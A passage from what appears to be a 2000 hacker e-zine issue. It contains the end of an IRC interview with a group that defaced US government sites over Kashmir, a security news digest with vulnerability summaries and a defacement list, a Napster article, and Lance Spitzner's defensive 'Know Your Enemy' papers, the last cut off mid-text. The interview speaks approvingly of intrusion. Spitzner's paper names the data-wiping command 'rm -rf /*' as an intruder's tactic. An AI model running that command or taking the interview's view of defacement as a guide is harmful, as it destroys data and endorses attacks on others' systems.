formation of the group was to create global awareness about kashmir. [21:06] which members are actually from Pakistan? [21:07] if any [21:07] we focus on kashmir, basically. [21:07] so nobody is actually from kashmir? [21:07] well i`m from pakistan, othger's would like to stay anonymous please. [21:08] well no one if from kashmir. [21:08] sure, np [21:08] =) [21:08] some of your defacements are gov servers, any reason of targeting gov's, are you afraid to get busted? [21:09] Not really, We are not afraid to get busted for the reason that it's a good cause, secondly members are out of the feds reach ;) [21:10] yeah of course [21:11] you are one of, if not the only, people on attrition that I've seen that actually have a REASON [21:11] instead of just "I 0wn j00" [21:11] :) [21:11] *** snipah- (**************) has joined #gforce [21:11] sory i got disconnected. [21:11] US government was targetted because 1) more people view .gov's and we can do a good job in achieving th goal, we are out for. 2) We're a big angry :) [21:12] big=bit [21:12] *** sp1n sets mode: +o snipah- [21:12] and it seems like you guys got some skill, seeing you don't really do any NT hacks [21:12] *** rpcb1nd (***************) has joined #gforce [21:12] *** sk0l (*****************) has joined #gforce [21:12] *** sp1n sets mode: +o rpcb1nd [21:12] *** sp1n sets mode: +o sk0l [21:13] i`m glad we don't do NT, [21:13] we are supported by a study group known as hexa labs [21:13] what is hexa labs [21:13] ? [21:13] Plus every member can code (usefully) [21:14] hexa labs is a study group, they find out vulnerabilities, code them (we help code) [21:14] most of it is being kept private. [21:14] *** sniper__ has quit IRC (Ping timeout) [21:14] you guys ever use your own exploits when using them on defacing? [21:15] *** sk0l sets mode: +l 14 [21:16] [rave-:#gforce PING] [21:16] ehhe [21:16] alot of times we use own exploitz [21:16] heh [21:17] sometimes we use a wuftp (b0f rulz) and bind.. but no details [21:17] yeah b0f rules [21:17] :) [21:17] :) [21:17] what do you guys think about ./hack kiddies on attrition like the Crime Boys? [21:18] *** snipah- has quit IRC (Ping timeout) [21:18] oh [21:18] we dont apreciate it, we think about just kids who dont know what to do. [21:19] who thinks about computer hacking/security is just get proggies from others dudes and exploit of Dos something [21:19] we think about computer security is a big culture and need to dedicate to it, studys, tests, and fucking blowing head [21:19] eheh [21:20] crimeboys is very poor [21:20] NT hackewrs [21:20] yeah I agree [21:20] are most of you guys teengagers? [21:21] i dunno about sniper but i have 20 yrs old [21:22] *** sniper__ (***************) has joined #gforce [21:22] wb [21:22] *** rave- sets mode: +o sniper__ [21:22] thx [21:22] so why do you think India is solely responisible for this ordeal in Kashmir? [21:24] *** rpcb1nd sets mode: +l 13 [21:24] because they are, 1) they are pretty lame as they don't wana listen to any one, the people want freedom but India won't let them to add to all this they rape innocent women, small children get murdered, made orphans. and they violate human rights [21:25] *** sp1n sets mode: +l 14 [21:26] nod [21:26] pretty violent [21:27] yep. [21:27] you guys plan on keep defacing and protesting till someone gets busted? [21:28] not sure, but yes we will be defacing for some while. ;) [21:28] what do plan on accomplishing by defacing on this issue? [21:29] to get people to realize the situation ? [21:29] yep, create global awareness, on many occasions people have asked us if kashmir is some one like kevin mitnick =) [21:30] obviously they 'kashmir' is some guy [21:30] hahah [21:31] they thought even. [21:31] any last comments/shout outs?:) [21:32] =] [21:33] yes [21:34] shoot:)\ [21:35] I`d like to thank mos (muslim online syndicates) for what ever they have done, Pakistan Hackers club, hexa labs for coding, attrition, munge, punkis, null, mcintyres, jerisho for fast mirroring, zillion@safemode , rr, cen, and all in @linuxsex [21:35] oh and #darknet@efnet ;) [21:36] last shouts to hwa security ;) [21:37] hah nice, thanks for the interview:) [21:37] ah, np [21:39] [rave-:#gforce PING] @HWA 300.0 [HNS] Help Net Security News Letter #20 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://net-security.org/ Net-Sec newsletter Issue 20 - 03.07.2000 http://net-security.org Net-Sec is a newsletter delivered to you by Help Net Security. It covers weekly roundups of security events that were in the news the past week. Visit Help Net Security for the latest security news - http://www.net-security.org. Subscribe to this weekly digest on: http://www.net-security.org/text/newsletter Table of contents: 1) General security news 2) Security issues 3) Security world 4) Defaced archives General security news --------------------- ---------------------------------------------------------------------------- SECURITY CHECKS CRASH ROUTERS Red-faced networking giant Cisco has been forced to warn customers that its routers can crash when tested for security vulnerabilities by security scanning software programs. Link: http://www.vnunet.com/News/1104718 SECURE MESSAGING Critical Path detailed a suite of secure messaging services designed to help enterprises protect information assets such as engineering drawings, financial documents, and legal agreements transferred over the Internet. Link: http://www.infoworld.com/articles/hn/xml/00/06/26/000626hncritical.xml UK BACKS OFF AWAY FROM RIP BILL CNN reports that the U.K. government is backing away from some of the more controversial aspects of its e-mail surveillance bill (Regulation of Investigatory Powers - RIP) currently under consideration in the House of Lords. Link: http://www.cnn.com/2000/TECH/computing/06/26/cybersnoop.idg/index.html CRACKED! PART 6: TELKING WITH THE ENEMY "Soon after rebuilding the system I started talking to someone on IRC that identified themselves as the person that had cracked our system. He was connecting from the same places that the cracker had been coming from and seemed to know things that only the cracker would have known, so I decided to take him at face value. Over the first couple of weeks we talked about a variety of subjects. I have selected some of the most interesting bits and grouped them together to give an idea of the flavor of the conversations. It was an interesting window into the mind of someone living a very different life." Link: http://www.rootprompt.org/article.php3?article=588 SCENES FROM THE "HACKERS" HOOD "The impression that most people fail to get from regular attacks is how trivial they are," said Elias Levy, chief technology officer of SecurityFocus.com. "These people tend to choose their targets pretty much at random - or whoever bothers them that day, or pisses them off." Link: http://www.wired.com/news/culture/0,1284,37238,00.html VIRUS SCAN FOR HANDHELDS It looks like McAfee is now offering virus scanning software for handheld computers. Altought there are no viruses for handhelds, there is an option to infect when you sync your handheld and your PC. Contributed by Brian. Link: http://www.mcafee.com/wireless/handscan/default.asp? MATTEL AND PRIVACY In response to public complaints about privacy, Mattel Interactive announced that the company would provide a tool that removes software that was surreptitiously placed on customers' computers and is designed to transmit and receive information to Mattel. Link: http://abcnews.go.com/sections/business/DailyNews/mattel000624.html BANK DETAILS SNATCHED A man calling himself 'Kelly' rang ABC radio station 2BL claiming he had accessed company details from the GST information site www.gstassist.gov.au, which contains the details of about 27,000 businesses. According to ZDnet AU, he said that he he simply used a inserted numbers between 1 and 27,000 into a CGI output and it retrieved records. Contributed by Apocalyse Dow. Link: http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html NIKE HIJACKING, PART II Nike.com hijacking received a sequel - when Nike's website was hijacked last week, traffic was redirected through one man's Web servers in the U.K., bogging them down and costing his Web hosting company time and money (at least he says so). Now he is suing Nike and he created "Shame on Nike" web site. Link: http://www.wired.com/news/politics/0,1283,37286,00.html Link: http://www.shameonnike.com/ LOVE LETTER CREATOR CHARGED Onel de Guzman is charged for writting the Love Letter worm. The National Bureau of Investigation will charge de Guzman "traditional" crimes such as theft and violation of a law that normally covers credit card fraud. If charged maximum penalty of 20 years in prison. COMPUTER ASSOCIATES REBUFFS SOPHOS ALLEGATIONS Simon Perry, Computer Associates' vice president, told Newsbytes that he viewed Sophos' comments as irrelevant, adding that the approach his firm takes with warnings customers about viruses is to warn them of any potential problems, for whatever reason. "Our reporting of viruses to our customers has drawn kudos, both from customers and the industry at large," he said, adding that the company aims to quickly let people know what the latest virus is and what the associated dangers are. Link: http://www.computeruser.com/news/00/06/30/news19.html STUDENT ADMITS GOVERNMENT ATTACKS A university student admitted in Boston federal court to breaking into U.S. government computers including Defense Department and NASA systems. Ikenna Iffih, a student at Northeastern University's College of Computer Science, pleaded guilty to a series of coast-to-coast cyber attacks before U.S. District Judge Robert Keeton late on Thursday. Link: http://www.wired.com/news/politics/0,1283,37352,00.html SEGA DREAMCAST COPYRIGHT PROTECTION BROKEN The Dreamcast game system has been viewed as one of the most secure digital entertainment systems on the market. It looks like it is not so secure. Group called Utopia has broken through copyright protections of the system. Link: http://news.cnet.com/news/0-1005-200-2181596.html?tag=st.ne.1005.sndstry.ni LEE ASHURT'S POINT OF VIEW Lee Ashurst accused of hacking into and sabotaging the Internet service Etisalat, has filed a defamation suit in Dubai against them. He has also set up a site with his opinion on the whole situation. Link: http://www.supportlee.4mg.com/ ISSUE DISCLOSURE POLICY Lewis Z. Koch did an article on Rain Forrest Puppy's "issue disclosure policy", a text dealing with reporting vulnerabilities to vendors. First version of this text file was sent to Bugtraq approximately 3 weeks ago. Link: http://mcafee.snap.com/main/page/pcp/cd/0,85,-1716-1431464-397786,00.html ---------------------------------------------------------------------------- Security issues --------------- All vulnerabilities are located at: http://net-security.org/text/bugs ---------------------------------------------------------------------------- IE 5 AND EXCEL 2000, POWERPOINT 2000 VULNERABILITY Internet Explorer 5.01, Excel 2000 and PowerPoint under Windows 98 (suppose other versions are also vulnerable, have not tested) allow executing programs when viewing a web page or HTML email message - in the latter case at least with IFRAME. This allows taking full control over user's computer. Link: http://www.net-security.org/text/bugs/962198313,44285,.shtml IE 5 AND ACCESS 2000 VULNERABILITY Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other versions are also vulnerable) allow executing programs when viewing a web page or HTML email message - (in the latter case with IFRAME). This allows taking full control over user's computer. Link: http://www.net-security.org/text/bugs/962198423,71032,.shtml PATCH FOR "ACTIVE SETUP DOWNLOAD" PROBLEM Microsoft has released a patch that eliminates a security vulnerability in an ActiveX control that ships with Microsoft Internet Explorer. The vulnerability could be used to overwrite files on the computer of a user who visited a malicious web site operator's site. Link: http://www.net-security.org/text/bugs/962463758,19962,.shtml DOS IN MICROSOFT WINDOWS 2000 SERVER Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible to a simple network attack which raises CPU utilization on Windows 2000 Server to 100%. Link: http://www.net-security.org/text/bugs/962540960,71332,.shtml DOS IN CHECK POINT FIREWALL-1 ON WINDOWS NT The SMTP Security Server component of Check Point Firewall-1 4.0 and 4.1 is vulnerable to a simple network-based attack which raises the firewall load to 100%. Link: http://www.net-security.org/text/bugs/962541047,22517,.shtml DOS IN MICROSOFT WINDOWS 2000 TELNET SERVER Microsoft Windows 2000 Server is supplied with a Telnet server for remote console access. A Denial of Service vulnerability exists in this server which may be exploited by a local or remote attacker. Link: http://www.net-security.org/text/bugs/962541114,23868,.shtml BOA WEBSERVER LOCAL PATH PROBLEM BOA Webserver is a small fast webserver that supports only basic functions. It beats the pants off of apache for speed however, the only problem is that it does not do any URL parsing. It admits this (somewhere on the page it says you better lock down your file system real good), but the problem still remains. Basically you can specify the full local path to any file on a Boa webserver and out it spits the contents. i.e. Link: http://www.net-security.org/text/bugs/962541273,5729,.shtml [MANDRAKE] WU-FTPD UPDATE Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. Link: http://www.net-security.org/text/bugs/962578199,96510,.shtml [MANDRAKE] - DHCP UPDATE The OpenBSD team discovered a vulnerability in it that allows for remote exploitation by a corrupt dhcp server, (or an attacker pretending to be a dhcp server). If this vulnerability is exploited, root access can be gained on the host running dhcp client remotely. The problem is that input is not checked and, as a result, it is possible to execute commands remotely when the network config files are being written on the dhcp client. Link: http://www.net-security.org/text/bugs/962578323,92268,.shtml ---------------------------------------------------------------------------- Security world -------------- All press releases are located at: http://net-security.org/text/press ---------------------------------------------------------------------------- CENTRAL COMMAND ANNOUNCES PERFECTSUPPORT - [26.06.2000] Today Central Command announced PerfectSupport, a new support service that provides mission critical antivirus support and services. This subscription service provides maximum virus protection to all organizations where virus prevention, and malicious application recovery is critical to their operation. This premium service includes unlimited toll-free phone support at any time and priority access to Central Command's Emergency Virus Response Team during virus outbreaks. Press release: < http://www.net-security.org/text/press/962040421,209,.shtml > ---------------------------------------------------------------------------- eWEEK CHALLENGES PUBLIC TO HACK THEM - [27.06.2000] In its second major test of Web enterprise security, Labs Interactive, by the editors of eWEEK, in conjunction with digital security services firm Guardent, has created an e-commerce site and is challenging the public to hack the site at openhack.com. Prize money of up to $2,500 will be awarded to the first hacker to crack the site which mimics a true corporate e-commerce network, including e-mail, Web server, a database application, remote access and five different operating systems. The challenge goes live on June 26 and runs through the first two weeks of July. Press release: < http://www.net-security.org/text/press/962098245,92659,.shtml > ---------------------------------------------------------------------------- GENUITY ANNOUNCES ENHANCED FIREWALL SERVICES - [27.06.2000] Genuity Inc., formerly GTE Internetworking, today announced significant new enhancements to the Site Patrol for FireWall-1 family of managed Internet security services. Designed to secure high-volume enterprise intranets and e-business extranets, new leading-edge features include the industry's first High Availability managed firewall service. Site Patrol uses StoneSoft Corporation's award-winning StoneBeat clustering technology with dynamic load balancing to ensure maximum availability, scalability and performance. In addition, a hot standby, High Availability option is also available for organizations with fixed throughput requirements. Press release: < http://www.net-security.org/text/press/962098361,38122,.shtml > ---------------------------------------------------------------------------- SECOND ANNUAL GLOBAL E-SECURITY CONVENTION - [28.06.2000] Baltimore Technologies, a global leader in e-security solutions, today announced the company's second annual Global e-Security Convention, focusing on the use of e-security to deliver secure, trusted business models and applications. Global e-Security 2000 is the most authoritative convention set up to educate delegates on the business and technology benefits of e-security. This convention will highlight PKI technology as an integral component of secure e-business with the ability to unleash endless opportunities for companies worldwide. Press release: < http://www.net-security.org/text/press/962198599,45835,.shtml > ---------------------------------------------------------------------------- CA ANNOUNCES ETRUST SINGLE SIGN-ON 6.5 - [28.06.2000] Computer Associates International, Inc., the world's leading eBusiness solutions provider, today announced the general availability (GA) of eTrust Single Sign-On (SSO) 6.5, the industry-leading secured access solution. The latest version of eTrust SSO provides a comprehensive solution for eBusinesses desiring integrated SSO and access control capabilities for existing client/server and Web-based applications from a single product. Press release: < http://www.net-security.org/text/press/962198695,70218,.shtml > ---------------------------------------------------------------------------- CYLINK ANNOUNCES GENERAL EELEASE OF NETHAWK - [29.06.2000] On June 23, Cylink Corporation began customer shipments of its NetHawk, the company's new high-speed virtual private network (VPN) appliance for secure, site-to-site Internet communications. NetHawk is an Internet Protocol Security (IPSec) solution that transparently integrates into the network, providing an enterprise-strength combination of performance and manageability. Press release: < http://www.net-security.org/text/press/962275562,59227,.shtml > ---------------------------------------------------------------------------- FREE LINUX FIREWALL RELEASED TO PUBLIC - [01.07.2000] NetMaster Networking Solutions, Inc. of Chilliwack, B.C., announced today they are making their Gateway Guardian Personal Edition firewall software available FREE for personal and non-profit use. It can be downloaded off their web site, www.GatewayGuardian.com, and also from over 100 download sites across the Internet. "We have done this to meet the increasing demand for firewall protection from families adopting high-speed cable, and DSL internet connections across Canada and the U.S.," said Steve Hemenway, NetMaster's Vice President of Sales and Marketing. Press release: < http://www.net-security.org/text/press/962464441,94200,.shtml > ---------------------------------------------------------------------------- INTERPOL AND ATOMICTANGERINE ANNOUNCE ALLIANCE - [01.07.2000] Companies worldwide will have new access to superior intelligence in their war against global cyber crime as a result of an innovative alliance between the private and public sector. Working directly with Menlo Park-based venture consulting powerhouse AtomicTangerine, famous Lyon, France-based Interpol has initiated a special relationship designed to deliver advanced intelligence collected by the law enforcement organization to corporations worldwide. Interpol is the world's pre-eminent organization supporting the prevention and detection of international crime. Press release: < http://www.net-security.org/text/press/962550257,75895,.shtml > ---------------------------------------------------------------------------- Defaced archives ------------------------ [25.06.2000] - Washington State Department of Social and Health Services Original: http://maa.dshs.wa.gov/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/25/maa.dshs.wa.gov/ [26.06.2000] - Epson Original: http://www.epson.com.cn/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/26/www.epson.com.cn/ [27.06.2000] - London Fire Brigade Original: http://www.londonfirebrigade.gov.uk/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/londonfirebrigade.gov.uk/ [27.06.2000] - Counterpart Consortium Turkmenistan Original: http://www.cpart.org Defaced: http://www.attrition.org/mirror/attrition/2000/06/27/www.cpart.org/ [28.06.2000] - LSU School of Social Work Original: http://www.socialwork.lsu.edu/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/28/www.socialwork.lsu.edu/ [29.06.2000] - The Bloodhound Gang Online Original: http://www.bloodhoundgang.com/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.bloodhoundgang.com/ [29.06.2000] - HyperHog Internet Service Original: http://www.hyperhog.net/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/29/www.hyperhog.net/ [30.06.2000] - Banco Union Colombiano Original: http://www.bancounion.com.co/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.bancounion.com.co/ [30.06.2000] - Philippine Association for Open Computing Original: http://www.passoc.org/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.passoc.org/ [30.06.2000] - The Undersecretariat of Foreign Trade Turkey Original: http://www.foreigntrade.gov.tr/ Defaced: http://www.attrition.org/mirror/attrition/2000/06/30/www.foreigntrade.gov..tr/ [01.07.2000] - White Force Original: http://www.whiteforce.com/ Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.whiteforce.com/ [01.07.2000] - College of New Caledonia Original: http://www.cnc.bc.ca/ Defaced: http://www.attrition.org/mirror/attrition/2000/07/01/www.cnc.bc.ca/ HNS staff staff@net-security.org http://net-security.org --------------------------------------------------------------------- To unsubscribe, e-mail: news-unsubscribe@net-security.org For additional commands, e-mail: news-help@net-security.org @HWA 301.0 [MM] NAPSTER GETS ORDERED TO BE SHUT DOWN IS THE FIGHT LOST? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sources: Mutiple ZDMet Article: Judge slams door on Napster Thu, 27 Jul 2000 08:56:41 GMT Lisa M. Bowman US district judge Marilyn Hall Patel showed little sympathy for the popular song-swap site, saying it was encouraging piracy by millions of users A federal judge on Wednesday issued a surprise injunction requiring Napster to block all copyrighted music on its site. The injunction will go into effect midnight Friday, local time. The recording industry must pay a $5m bond against any financial losses Napster might suffer by being shut down pending trial. Saying the recording industry is likely to prevail in its copyright infringement case against the popular song-sharing company, US district judge Marilyn Patel's ruling could, in effect, shut down the free music swapping service. Patel ruled unexpectedly from the bench immediately after a two-hour hearing, telling a packed courtroom her order would keep Napster from "copying or assisting or enabling or contributing to the copy or duplication of all copyrighted songs and musical compositions of which the plaintiffs hold rights". The Recording Industry Association of America filed a lawsuit in December, just five months after Napster's launch, saying the company's song-sharing service promotes copyright infringement. The case is scheduled for trial later this year. Patel denied a motion by Napster attorney David Boies, which asked her to delay the order. Outside the courtroom, Boies vowed an appeal and, separately, Napster executives said the company would file papers Thursday morning. Boies said the order was "impossible to implement or obey" since Napster has not received a list of songs it is required to block. And, while Patel's order stopped short of pulling the plug, Boies said the injunction could cripple the business. "Between now and the actual trial, Napster's service obviously is going to be seriously curtailed [if the injunction isn't lifted]" , Boies said, adding that a settlement, though possible, was unlikely. RIAA general counsel Cary Sherman applauded the order, saying that it laid the groundwork for legal music downloads and that it could send a message to other song-swapping firms. In issuing the order, Patel denied virtually every defence claim by Napster. The RIAA recently sued another file sharing company, Scour, on similar grounds. "Our hope is that the court's decision, which is very, very clear, and very, very strong, will send a very clear signal to all those other companies," Sherman said. She said swapping songs with Napster wasn't protected under the Audio Home Recording Act, as the defence had argued, in part because it involved so many people. She added that evidence so far in the case, including internal Napster memos, had convinced her that most people used the service primarily to download copyrighted materials. Patel bought the recording industry's argument that Napster resisted complying with federal law by failing to pay royalties to copyright owners. Recording industry attorney Russell Frackman told the judge that 20 million songs were downloaded daily, of which roughly 90 percent were copyrighted. He said that Napster planned to have a user base of 75 million users by the end of the year. "The record companies not only get no return on their investment, but Napster is piggy-backing," Frackman said, adding that reining in the company would only become more difficult in the future. "The longer this goes on, your honour, the more impossible it will be for us and the court to do anything realistic," he continued, asking her to "nip this in the bud". He also said studies showing that CD sales were rising even as Napster gained momentum were "weak" and "irrelevant". At some points Patel was clearly irritated at Napster attorneys, challenging many of their assertions and asking them many more questions than she had asked the recording industry attorneys. After reading internal Napster planning documents related to the case. "Pirating be damned is pretty much the sense one gets," she said. "Free music for the people!" she quipped, prompting chuckles in the courtroom. Later, Patel abruptly ended Napster's presentation after an exasperated Napster attorney, Daniel Johnson, told her "you're not listening". "You may have a seat," Patel shot back. And he did. After her ruling, Patel gave both sides a chance to respond. Boies asked Patel directly if she intended to close Napster down. "I'm not ordering them to shut their business down. I want to make that clear," Patel said. During the hearing, Patel seemed not to understand that Napster was not the only site that allowed users to download free music. When Napster attorneys pointed out that people could swap songs through other -- though decidedly less popular -- means, such as chat rooms and Gnutella, Patel challenged them, saying "but you have to pay". At one point, Patel asked Johnson, "What about Gnutella, do you have to pay?" Johnson told her she did not. On Wednesday evening, company founder Shawn Fanning and chief exec Hank Barry held a brief Webcast to address user concerns. "We will keep fighting for Napster and your right to share music over the Internet," Fanning said. Barry said the company would work through the night on a solution to an injunction he said could shut the service down in its current form. "Although we sharply and firmly disagree with the judge's decision, we understand the basis for it and we plan to comply." David Coursey reckons at the end of the day, history will judge that Napster wasn't an advocate of "the Internet should be free" but a greedy bunch of corporate raiders trying to make their fortune off the property of others. HWA Says; "Fuck him and the horse he rode in on", I have as a result of exposure to material I otherwise would not have been able to sample have purchased MORE cd's than I previously did. A true fan wants a piece of their idol, that includes the crappy jewel case box and the cool colour booklet that is included with the cd set. - Cruciphux @HWA 302.0 [IND] Paper: Know your enemy #1 by Lance Spitzner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an excellent series by Lance Spitzner I've included the entire set and supporting logs and docs where available. This is highly recommended reading by both hacker camps - Ed The Tools and Methodologies of the Script Kiddie Know Your Enemy Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 21 July, 2000 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article, the first of a series, does just that, it discusses the tools and methodology of one of the most common and universal threats, the Script Kiddie. If you or your organization has any resources connected to the Internet, this threat applies to you. Know Your Enemy: II focuses on how you can detect these threats, identify what tools they are using and what vulnerabilities they are looking for. Know Your Enemy: III focuses on what happens once they gain root. Specifically, how they cover their tracks and what they do next. Know Your Enemy: Forensics covers how you can analyze such an attack. Finally, Know Your Enemy: Motives, the result of a group project, uncovers the motives and psychology of some members of the black-hat community, in their own words. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the black-hat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. You can see examples of this in Know Your Enemy: Motives The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated black-hats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when black-hats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the black-hat is, but it is 1pm for you. This methodology of scanning for vulnerable systems can be used for a variety of purposes. Recently, new Denial of Service attacks have been reported, specifically DDoS (Distributed Denial of Service attacks). These attacks are based on a single user controlling hundreds, if not thousands of compromised systems throughout the world. These compromised systems are then remotely coordinated to execute Denial of Service attacks against a victim or victims. Since multiple compromised systems are used, it is extremelly difficult to defend against and identify the source of the attack. To gain control of so many systems, script kiddie tactics are often employed. Vulnerable systems are randomly identified and then compromised to be used as DDoS launching pads. The more systems compromised, the more powerful the DDoS attack. One example of such an attack is 'stacheldraht',. To learn more about Distributed Denial of Service attacks and how to protect yourself, check out Paul Ferguson's site Denialinfo The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system. Once the vulnerable systems have been identified, the black-hat strikes. For a better understanding of how these tools are used, check out Know Your Enemy: Forensics. How to Protect Against This Threat There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both www.cert.org and www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq (archived at securityfocus.com )is one of the best sources of information. Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. @HWA 303.0 [IND] Paper: Know your enemy #2 by Lance Spitzner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Tracking their moves Know Your Enemy: II Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: July 7, 2000 This article is the second of a three part series. In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically, how they probe for vulnerabilities and then attack. The third paper covers what script kiddies do once they gain root. Specifically, how they cover their tracks and what they do next. This, the second paper, will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot determine, with your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start. Securing Your Logs This article is not on Intrusion Detection, there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applicatons such as Network Flight Recorder or snort. This article focuses on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first thing most black-hats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging all together (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a compromised system. If nothing else, the black-hat can simply do a rm -rf /* on your system, wiping your hard drive clean. This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both locally and to a remote log server. I recommend making your log server a dedicated system, ie. the only thing it should be doing is collecting logs from other systems.. If money is an issue, you can easily build a linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or un-authorized logging information from the Internet. For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the black-hat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the black-hat from realizing the true destination of our remote logging. Another option for your systems 